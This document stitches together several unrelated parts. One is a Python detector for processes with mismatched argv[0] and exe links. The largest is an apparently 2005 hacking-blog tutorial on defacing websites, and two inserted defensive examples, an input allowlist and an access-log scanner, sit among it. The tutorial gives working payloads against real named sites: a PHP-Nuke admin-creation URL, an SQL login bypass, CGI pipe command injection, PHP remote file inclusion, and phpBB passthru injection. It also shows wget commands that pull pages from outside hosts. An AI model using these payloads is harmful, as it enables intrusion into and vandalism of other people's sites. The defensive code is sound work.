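    tokens = name.split()
    first = tokens[0] if tokens else ""
    first = first.rstrip(":").lstrip("-")  # "sshd: user" -> "sshd", "-bash" -> "bash"
    return os.path.basename(first)


def argv0_mismatches(proc_root="/proc"):
    """Processes whose argv[0] does not agree with the binary /proc/<pid>/exe points at."""
    findings = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        pid_dir = os.path.join(proc_root, name)
        try:
            with open(os.path.join(pid_dir, "cmdline"), "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode(errors="replace")
            exe = os.readlink(os.path.join(pid_dir, "exe"))
        except OSError:
            continue  # kernel thread, process already gone, or no permission
        if not argv0:
            continue
        a, e = normalize(argv0), normalize(exe.replace(" (deleted)", ""))
        # Interpreters ("python3" vs "python3.11") and login shells differ only by
        # a prefix; anything else (here "httpd" vs "bind") is reported.
        if not (a.startswith(e) or e.startswith(a)):
            findings.append((int(name), argv0, exe))
    return sorted(findings)


def listening_tcp_ports(tcp_table):
    """Ports in LISTEN state (st == 0A) from the text of /proc/net/tcp."""
    ports = set()
    for line in tcp_table.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) > 3 and fields[3] == "0A":
            ports.add(int(fields[1].rsplit(":", 1)[1], 16))  # local port is hex
    return sorted(ports)


# Constructed stand-in for /proc/net/tcp: a listener on 2006 (0x07D6, the PORT in
# the source above) next to an ordinary listener on 22 and one established connection.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0
   1: 00000000:07D6 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5678 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0016 0100007F:9C40 01 00000000:00000000 00:00000000 00000000     0        0 9012 1 0000000000000000 20 4 30 10 -1
"""


def build_demo_proc(root):
    """Constructed /proc tree: pid 101 mimics the backdoor, 102 and 103 are benign."""
    demo = [
        (101, b"/usr/sbin/httpd\0", "/home/vQ/bind"),            # argv[0] overwritten, exe is the real file
        (102, b"-bash\0", "/bin/bash"),                          # login shell, leading dash is normal
        (103, b"/usr/sbin/httpd\0-k\0start\0", "/usr/sbin/httpd"),  # the genuine httpd
    ]
    for pid, cmdline, exe in demo:
        d = os.path.join(root, str(pid))
        os.makedirs(d)
        with open(os.path.join(d, "cmdline"), "wb") as f:
            f.write(cmdline)
        os.symlink(exe, os.path.join(d, "exe"))  # dangling link is fine for readlink()
    return root


def demo_findings():
    """Run the detector over the constructed tree and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return argv0_mismatches(build_demo_proc(tmp))


if __name__ == "__main__":
    for pid, argv0, exe in demo_findings():
        print(f"pid {pid}: argv[0]={argv0!r} but exe={exe!r}")
    print("listening:", listening_tcp_ports(SAMPLE_PROC_NET_TCP))
```

The prefix comparison in `normalize` is deliberately loose so that interpreters, login shells and daemons that rewrite their title (sshd, postfix) do not drown the real finding; on a production host the remaining hits are few enough to review by hand, and pairing an unexplained listener from `/proc/net/tcp` with a mismatched process is the quickest confirmation.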

Defacement Steps
Written 7 October 2005 in Hacking at 23:25 → 20 bloggers commented
Defacing a PHP-Nuke site
Open www.google.com
then type =>
allinurl:.com/nuke/index.php or
allinurl:.org/nuke/index.php.
Well..... once you have found a target, the next
steps are:
1. www.target.com/nuke/index.php
2. www.target.com/nuke/admin.php =>
the index.php above is changed
to admin.php
3. Append this bug to the end of that URL:
?op=AddAuthor&add_aid=budakbaonk&add_name=
God&add_pwd=bajingan&add_email=
sandal_karet@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
for example: www.target.com/nuke/admin.php?
op=AddAuthor&add_aid=budakbaonk&add_name=
God&add_pwd=bajingan&add_email=
sandal_karet@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
If it refuses, the site has already been patched by its admin.
But if it works, your browser's address bar will show
www.target.com/nuke/admin.php?op=mod_author
5. There you are asked to log in; enter the id & password from before.
Still remember them?
id=budakbaonk => see above
password=bajingan => see above
Now you are in the site's "Administration Menu".
That means you now control the site! He he he he he
Now pick the mobile-phone icon (with "Messages" written under it),
Title field =>

Content field =>

Expiration field => unlimited
then click the add messages tab at the bottom
Once done, open a new browser window and type the target site,
e.g. www.target.com/nuke or www.target.com/nuke/index.php
if the defacement does not show, try clicking the refresh button
at the top next to your address bar
========================================
Defacing ASP/IIS using Win 98
1. Click the "My Computer" icon on your computer.
2. Find the "Web Folders" icon inside My Computer.
3. Click the "Add Web Folder" icon and
"Type the location to add" will appear.
4. Type the name of the site you want to deface/add a file to,
for example http://www.52down.com. Then click Next.
5. "Enter the name for this Web Folder" appears; click Finish.
If there is no "Finish" or you get an "Error", it cannot be defaced,
so you have to look for another target.
6. If that worked, go back to Web Folders; there you will see
a file http://www.52down.com. Click that site file.
7. Open your "Hacked.html" file from earlier (if you do not have an html file yet,
make one in MS FrontPage first and save it on your PC),
copy it, then go back to the http://www.52down.com file and
paste the "Test.html" file there. If it cannot be pasted,
the admin has already patched it, so you have to look for another target.
8. If it worked, look at the result in the browser,
for example http://www.52down.com/Test.html
9. To find targets, search on www.google.com and
type allinurl:.com/index.asp or allinurl:.org/default.asp;
finding targets is up to your creativity.
Or you can find targets at http://www.zone-h.org/en/defacements/
click the mirror on the right (the Windows 2000 one),
look at the target => Defacer: Infektion Group
Domain : www.namatarget.com << this is the target
=======================================
how to make the html:
Open MS FrontPage, click the Format tab at the top, then choose Background,
then choose enable hyperlink, then choose the background color,
pick black, then OK.
Then choose the center tab at the top (center alignment) like in MS Word,
pick font size no. 5 (18pt), then choose font color (the A icon),
pick red, then write Hacked by your nick,
press Enter 3 times, then type
Hey Admin........do you a need help ? then Enter once,
then write Matrix.Dal.Net - #surabayahack, then Enter 3 times.
If you want to use a picture, choose the Insert tab at the top, then Picture,
then From File...., in the file name type
http://www.finagro.gov.co/902.gif or pick a jpg/gif file on your PC,
then OK. If you want music, choose the Format tab at the top,
then Background, then the General tab,
under "background sound location" type
http://www.indonesia.go.id/berkibar.mid or pick a midi file on your PC,
then OK. To save it, choose the File tab at the top, pick Save As...
file name: Hacked or your nick, then OK.
Note: if while saving a "save embedded file" dialog appears,
choose "set action" then "don't save" then OK.
To see the result, choose the Preview tab at the bottom.
=======================================
Defacing a guestbook
Using the SQL injection technique, we can deface guestbooks
whether they are php, asp, cfm, cgi, html files and so on. Remember, not
every guestbook can be defaced.
The steps
I. Find a target guestbook on www.google.co.id by typing
site:my guestbook.php or site:com bukutamu.php
II. Once you have a target, say www.namatarget.my/guestbook.php,
what you need to do is fill in the guestbook fields provided.
You do not need to fill in the guestbook with your real identity;
a fake identity is enough.
example:
Name : boneka lucu
Email : boneka_2005@yahoo.com
Website : www.boneka-lucu.com
From : toko boneka
Comment :

Look carefully at the command in the comment field; by
SQL injection into that guestbook, we insert
a picture there (not a porn picture, okay? that is not allowed,
mama will get angry). Then click the "submit" button or whatever
the button in that guestbook is called. Next open a new browser window and
type the target www.namatarget.my/guestbook.php
If the result is not there yet, try clicking the "refresh" button next to your
address bar. There... the picture we entered shows up in the guestbook.
That means the guestbook can be defaced.
Note:
If there is no picture, only the text

then that guestbook cannot be defaced. Do not be disappointed!
look for another target.
III. Once the picture we entered shows up,
open the guestbook again. Then fill in the guestbook fields again.
example:
Name : deface
Email : deface_2005@yahoo.com
Website : www.deface.com
From : dunia maya
comment :

Look carefully at the command in the comment field; by SQL injection into that guestbook, we insert the script for the defacement.
Note:
Before you enter the script above, edit its wording to your
liking first.
IV. Click the "submit" button or whatever the button in that guestbook is called.
Next open a new browser window and type the target www.namatarget.my/guestbook.php
If the result is not there yet, try clicking the "refresh" button next to your address bar.
There... our defacement shows up in the guestbook.
======================================
defacing asp with sql injection
1. open the browser at www.google.co.id
2. type site:go.id login.asp
say we get the target www.namatarget.com/login.asp
3. for username and password type 'or''='
4. open the files there one by one
5. find a file we can change/deface
6. open a new browser window and type the target, e.g. www.namatarget.com
7. if the result is not there yet, click the refresh button next to your address bar
======================================
defacing cgi
https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<< file aslinya
append |pwd| to the end
|pwd| <<< command/bug for linux/unix
https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html|pwd|
what the target web page shows is /home/sites/site52/users/wolfsecu/web/coartcds/Web_store
ok......continue
https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html|wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /home/sites/site52/users/wolfsecu/web/jh.htm|
kasih jarak 1 spasi wget dgn situs lu
-O << ini huruf -O besar, bukan angka nol
cara liat nya => https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< perhatikan baik2
.../home/sites/site52/users/wolfsecu/web/jh.htm <<< perhatikan baik2
.../coartcds/Web_store <<< musti dibuang
cara cari target => allinurl:*.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl:*.cgi%3Fpage%3D*.html+site:.com&hl=id&lr=&start=10&sa=N
target nya musti file html diujung nya kalo mau tambahin |pwd|
=======================================
deface CGI II
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|id|
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd|
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|echo "Hacked by psychophysiological. Hey admin...do you a need help ? Matrix.Dal.Net - surabayahack" > /usr/home/web/users/a0004481/html/adspro/jh.html|
http://www.sports-media.org/adspro/jh.html
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm << the original file
|id| <<<<<<<<<<<<<<< to see the user on that server
|pwd| <<<<<<<<<<<<< to see the directory on that server
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd| >>>>>>> usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro
usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro <<<<<<<< look closely
usr/home/web/users/a0004481/html/adspro/jh.html <<<<<<<< look closely
cgi-bin/adspro <<<<<<< dropped
to view the index.html file => http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|whereis%20index.html|
http://www.enveracruz.com.mx/mercadito.cgi?page=../ventas.html|echo "Hacked by psychophysiological. Hey admin...do you a need help ? Matrix.Dal.Net - surabayahack">decae.html|&cart_id=9721374.5730
http://samedesign.us/cgi-bin/web_store.cgi?page=about.html|echo%20

======================================
deface PHP with injection
http://dillon2.edumail.us/index.php?name=PNphpBB2&file=index&c=4
that's the original file
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
that's the bug
http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?
so index.php?name=PNphpBB2&file=index&c=4 gets dropped
how to inject it: http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?
in the unix command box enter
wget http://geocities.com/nusantarajaya_2004/arai.html
to view it: http://dillon2.edumail.us/modules/PNphpBB2/includes/arai.html
http://www.narnia-chroniken.de <<< front page defaced
http://www.narnia-chroniken.de/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/sandal_karet/script/arai2.jpg?
type : pwd
cd /homepages/7/d117874362/htdocs;wget [your defacement file]
========================================
deface PHP with injection II
http://www.giphted.com/index.php?siteName=pics%2Fom%2Findex.php
that's the original file
http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?
in the box enter: pwd
so pics%2Fom%2Findex.php gets dropped
how to inject it: http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?
in the box enter: wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /export/home/beangyy/www/arai.html
to view it: http://www.giphted.com/arai.html
=========================================
deface phpBB/forums
http://www.bpmpt.go.id/forum/index.php
that's the original file
includes/db.php?phpbb_root_path=
that's the bug
so index.php gets dropped
http://www.bpmpt.go.id/forum/includes/db.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/ara2.jpg?
in the box enter: pwd
If "Hacking attempt" comes back it means it's been patched
But if it works, it's up to you what you do with it......
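Every bug in the CGI and PHP sections above is the same mistake: a request parameter (page=, phpbb_root_path=, siteName=) is handed to open() or include() unchecked, so a pipe turns the file name into a command and an http:// value turns the include into remote code. The "Hacking attempt" reply is phpBB's guard against its include files being requested directly. The following is an added Python example, not the original post's code nor any project's, of how such a parameter should be resolved on the server side: an allowlist on the name, a check that the resolved path stays inside the document root, and nothing else ever reaching the filesystem. The document root and its two pages are constructed in a temporary directory so the demo runs offline.

```python
import re
import tempfile
from pathlib import Path

# Things a page name must never look like: a URL scheme, or shell/path metacharacters.
URL_SCHEME = re.compile(r'^[A-Za-z][A-Za-z0-9+.\-]*:')
METACHARS = re.compile(r'[|;&`$<>\\\x00]')
# Allowlists: '.' is only permitted in the .html/.htm suffix, which also kills "../".
FLAT_NAME = re.compile(r'[A-Za-z0-9_\-]+\.html?')
NESTED_NAME = re.compile(r'[A-Za-z0-9_\-/]+\.html?')


def check_page(page, allow_subdirs=False):
    """Return None if the page name is acceptable, else a short rejection reason."""
    if not page or len(page) > 255:
        return "empty-or-too-long"
    if URL_SCHEME.match(page):
        return "remote-url"        # http://... would become remote file inclusion
    if METACHARS.search(page):
        return "metacharacter"     # a.html|pwd| would become command injection
    pattern = NESTED_NAME if allow_subdirs else FLAT_NAME
    if not pattern.fullmatch(page):
        return "bad-name"          # traversal, wrong extension, stray characters
    return None


def resolve_page(doc_root, page, allow_subdirs=False):
    """Map a 'page' parameter to a file under doc_root.

    Returns (path, None) on success or (None, reason) on rejection."""
    reason = check_page(page, allow_subdirs)
    if reason:
        return None, reason
    root = Path(doc_root).resolve()
    candidate = (root / page).resolve()
    # Defense in depth: a name that passed the allowlist must still resolve inside
    # the root; an absolute name such as /etc/x.html replaces root when joined.
    if root not in candidate.parents:
        return None, "outside-root"
    if not candidate.is_file():
        return None, "missing"
    return candidate, None


def build_demo_root():
    """Constructed document root with two pages, so the example runs offline."""
    root = Path(tempfile.mkdtemp(prefix="demo_docroot_"))
    (root / "about.html").write_text("<h1>About</h1>")
    (root / "pages").mkdir()
    (root / "pages" / "intro.html").write_text("<h1>Intro</h1>")
    return root


if __name__ == "__main__":
    root = build_demo_root()
    for name in ["about.html", "about.html|pwd|", "http://example.invalid/shell.txt?",
                 "../../etc/passwd", "pages/intro.html", "/etc/passwd.html"]:
        path, reason = resolve_page(root, name, allow_subdirs=True)
        print(f"{name!r:42} -> {reason or path}")
```

The allowlist does most of the work; the containment check exists for the day someone loosens the regex. Keeping allow_subdirs off unless a site really serves nested pages is the smaller attack surface.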
==========================================
deface phpBB/forums II
http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12
that's the original file
&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd
that's the bug
how to inject it: http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd
there are 3 ways to wget :
1.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geocities.com/nusantarajaya_2004/arai.html;ls
2.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geocities.com/nusantarajaya_2004/arai.html -O /var/www/singapore/jh2.htm
3.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=lwp-download%20http://geocities.com/nusantarajaya_2004/arai.html;ls
usually it's the 3rd way that works.
to view it: http://singapore.bluejackings.net/arai.html
=========================================
viewing a Friendster profile without logging in
http://www.friendster.com/useropen.php?uid=
<<<<<< enter the id number
===========================================
deface PHP with injection III
just fire straight at it, boss, so it doesn't take forever
www.target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?
if it works, same as usual
cmd sql php injection
to find a folder we have access to
cmd => find / -perm 777 -type d
if the folder says permission denied it means we can't do anything in that folder
look for a folder that doesn't have the word perm next to it
take this one as an example
http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?
find a folder with access [the command is above]
cmd => find / -perm 777 -type d
it'll eat bandwidth
so just be patient
=== example of -perm denied ==
find: /mnt/drive2/lost+found: Permission denied
find: /proc/tty/driver: Permission denied
find: /proc/1/task/1/fd: Permission denied
that means no access
we look for another one
but try to get a folder under /var/www/
if there isn't one that's fine too
there are others
/home/httpd/vhosts/hdca.org/httpdocs/downloads => example of a folder that works
cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;[basic OS command]
[basic OS command] => wget, dir, cat, rm, rm -rf etc.
now we wget
cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;wget http://www.geocities.com/nusantarajaya_2004/arai.html
try entering it
into the cmd
---------------------------------------------------------
--10:35:01-- http://www.geocities.com/nusantarajaya_2004/arai.html
=> `arai.html'
Resolving www.geocities.com... 66.218.77.68
Connecting to www.geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,021 [text/html]
0K ..... 100% 98.21 KB/s
10:35:02 (98.21 KB/s) - `arai.html' saved [6,021/6,021]
---------------------------------------------------------
that means it saved successfully
because it's under httpdocs
it's easy to view
/home/httpd/vhosts/hdca.org/httpdocs/downloads => www.hdca.org/downloads/[your defacement file]
example www.hdca.org/downloads/arai.html
and that's it
easy, right
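From the defender's side, every request walked through above leaves an unmistakable trace in the web server's access log: the |pwd| pipe inside a CGI page= parameter, the http:// value in phpbb_root_path= or siteName=, and the passthru(...) payload in phpBB's highlight= parameter. The following is an added Python example, not code from the original post, that parses a handful of constructed NCSA-format log lines and flags those three shapes; the addresses, host names and timestamps in the sample are made up (documentation IP ranges and a reserved .invalid host). Each parameter value is decoded twice so that double encoding such as %2527 is seen for what it is.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# NCSA common log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
PHP_EXEC = re.compile(r'\b(?:passthru|system|exec|shell_exec)\s*\(|\$HTTP_GET_VARS',
                      re.IGNORECASE)


def classify_target(target):
    """Return the set of finding labels ('kind:param') for one request target."""
    findings = set()
    query = urlsplit(target).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl has already decoded once; decoding again exposes double
        # encoding, e.g. %2527 -> %27 -> ' in the phpBB highlight payload.
        decoded = unquote(value)
        if REMOTE_URL.match(decoded):
            findings.add("remote-file-inclusion:" + key)
        if "|" in decoded:
            findings.add("pipe-command-injection:" + key)
        if PHP_EXEC.search(decoded):
            findings.add("php-code-injection:" + key)
    return findings


def scan_log(text):
    """Parse log lines and return one record per request that raised a finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; a real tool would count these
        findings = classify_target(m.group("target"))
        if findings:
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "target": m.group("target"), "findings": sorted(findings)})
    return hits


# Constructed sample: five requests, three malicious, two benign.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Aug/2005:10:35:01 +0000] "GET /Web_store/web_store.cgi?page=coart_frontpage.html|pwd| HTTP/1.1" 200 512
203.0.113.5 - - [06/Aug/2005:10:35:07 +0000] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://example.invalid/shell.txt? HTTP/1.1" 200 3001
203.0.113.5 - - [06/Aug/2005:10:35:12 +0000] "GET /phpBB2/viewtopic.php?t=12&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id HTTP/1.1" 200 7712
198.51.100.7 - - [06/Aug/2005:10:36:00 +0000] "GET /Web_store/web_store.cgi?page=about.html HTTP/1.1" 200 2048
198.51.100.7 - - [06/Aug/2005:10:36:05 +0000] "GET /index.php?siteName=pics%2Fom%2Findex.php HTTP/1.1" 200 1500
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["time"], ", ".join(hit["findings"]))
        print("   ", hit["target"])
```

Three hits with a 200 status on the same source address within seconds is exactly the sequence this tutorial describes; the benign siteName=pics%2Fom%2Findex.php request is left alone because a relative path with no pipe, scheme or PHP call is what the application expects.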
http://www.zone-h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/
http://www.blogbugs.com/index.php?mod=articledetail&&aid=Nzk=
http://www.tyg2004.de/index.php?page=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=id;pwd
http://img143.imageshack.us/img143/6782/hacked8lc.jpg
http://www.sobatpadi.net/download/
http://www.sinjai.go.id/profil.php?kat=kelautan_perikanan&dir=http://www.geocities.com/dian_maulani2005/inject.htm?&cmd=id;pwd;ks%20-la
http://www.infokomputer.com/aktual/aktual.php?id=Dian+Maulani

Vulnerabilities pesan.php
Written 21 September 2005 in Hacking at 16:29
- Open www.google.co.id and type allinurl:.org/pesan.php
- Once you have a target, for example: http://policewives.org/pesan.php
then look at "Click here to sign in message". The link is http://policewives.org/pesan.php?op=add - In the message field inject this script :

- If a picture shows up, it can be defaced.
If no picture shows up and all you get is text
it can't be defaced.
Don't be disappointed! Look for another target. - If a picture shows up, next we inject again with the guestbook defacement script (see the guestbook defacement tutorial).
- DONE !!!